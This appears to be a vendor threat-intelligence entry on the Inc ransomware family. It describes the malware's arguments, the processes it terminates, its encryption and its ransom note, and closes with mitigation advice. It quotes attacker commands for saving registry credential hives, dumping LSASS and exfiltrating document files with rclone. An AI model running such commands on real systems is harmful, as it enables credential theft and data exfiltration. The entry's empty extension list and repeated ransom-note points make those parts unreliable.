Threat behavior
Specific commands used for credential acquisition and data exfiltration:
- Credential acquisition: C:\Windows\system32\taskmgr.exe" /4 reg save HKLM\SYSTEM C:\ProgramData\sys
- Rclone exfiltration path: C:\windows\appcompat\rclone.exe --config c:/windows/appcompat/conf2.txt copy \\[compromised network share]\d$\DATA\ local:[identifier]--ignore-case --ignore-existing --auto-confirm --multi-thread-streams 20 --transfers 20 --checkers 20 --tpslimit 20 --include *.docx --include *.docm --include *.pdf --include *.pptx --include *.xls --include *.xlsx --include *.ppt --include *.txt --include *.pptx --include *.doc --include *.csv --include *.jpeg --include *.jpg --include .msg --max-size 1000M --max-age ****
- LSASS/ProcDump: C:\ProgramData\util.exe
- Ransom:Win32/Inc.MA!MTB supports various arguments to suit the threat actor’s preferences.
Here is the help information for the arguments supported:
C:\Users\IEUser\Desktop>inc.exe --help
USAGE: inc.exe [ARGUMENTS]
ARGUMENTS:
--file <FILE> Encrypt only selected file
--dir <DIRECTORY> Encrypt only selected directory
--mode <MODE> Choose mode for file encryption (fast, medium, slow)
--ens Encrypt network shares
--lhd Load hidden drives
--sup Stop using process
--hide Hide console window
--kill Kill processes/services by mask
--debug Enable debug mode
--help Display this message
Ransom:Win32/Inc.MA!MTB terminates the following processes:
- sql
- veeam
- backup
- exchange
- java
Ransom:Win32/Inc.MA!MTB avoids encrypting files in the following folders:
- Microsoft SQL Server
- Windows
- Program Files
- Program Files (x86)
- $RECYCLE.BIN
- AppData
Ransom:Win32/Inc.MA!MTB avoids encrypting files with the following extensions:
Ransom:Win32/Inc.MA!MTB uses Curve25519 and AES algorithms to encrypt files.
Encrypted files have the .INC extension.
It generates ransom notes in .html and .txt formats.
The note says that your data has been stolen and encrypted, and that they will publish it on the dark web if you don't pay a ransom. They also claim that they are not a politically motivated group and that they just want money.
Here are some of the key points from the ransom note:
- Your data is stolen and encrypted.
- The threat actors will publish your data on the dark web if you don't pay a ransom.
- The threat actors claim that they are not politically motivated and that they just want money.
- The threat actors offer to provide you with decryption software and destroy your stolen data if you pay the ransom.
- The threat actors warn you not to delete or modify the encrypted files, or it will lead to problems with decryption.
- The threat actors warn you not to go to the police or the FBI for help, because they won't help you.
- The threat actors warn you not to go to recovery companies, because they are just middlemen who will make money off you and cheat you.
Here are the key details of the note:
- They claim to have stolen and encrypted your data.
- They will publish your data on the dark web if you don't pay a ransom.
- They offer a decryption tool and promise to destroy your data after you pay.
- They tell you to contact them on the Tor dark web using your personal ID.
- They warn you not to delete or modify the encrypted files.
- They discourage you from going to the police, FBI, or a data recovery company.
Prevention
Guidance for Individual users
Keep your operating system and antivirus products up to date. Customers who have turned on automatic updates do not need to take additional action
Take these steps to help prevent malware infection on your computer.
Guidance for enterprise administrators and Microsoft 365 Defender customers
Ransomware more than often attacks enterprises than individuals. Following the below mitigation steps can help prevent ransomware attacks.
Microsoft recommends the following mitigations to reduce the impact of activity:
- Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
- Run EDR in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
- Enable investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
- Use Microsoft Defender for Office 365 for enhanced phishing protection and coverage against new threats and polymorphic variants. Defender for Office 365 customers should ensure that Safe Attachments and Safe Links protection is enabled for users with Zero-hour Auto Purge (ZAP) to remove emails when a URL gets weaponized post-delivery.
- Microsoft 365 Defender customers can turn on attack surface reduction rules to prevent common attack techniques used in ransomware attacks:
- Block process creations originating from PsExec and WMI commands – Some organizations might experience compatibility issues with this rule on certain server systems but should deploy it to other systems to prevent lateral movement originating from PsExec and WMI, including Impacket’s WMIexec.
- Block executable files from running unless they meet a prevalence, age, or trusted list criterion
- Use advanced protection against ransomware
- Block all Office applications from creating child processes.
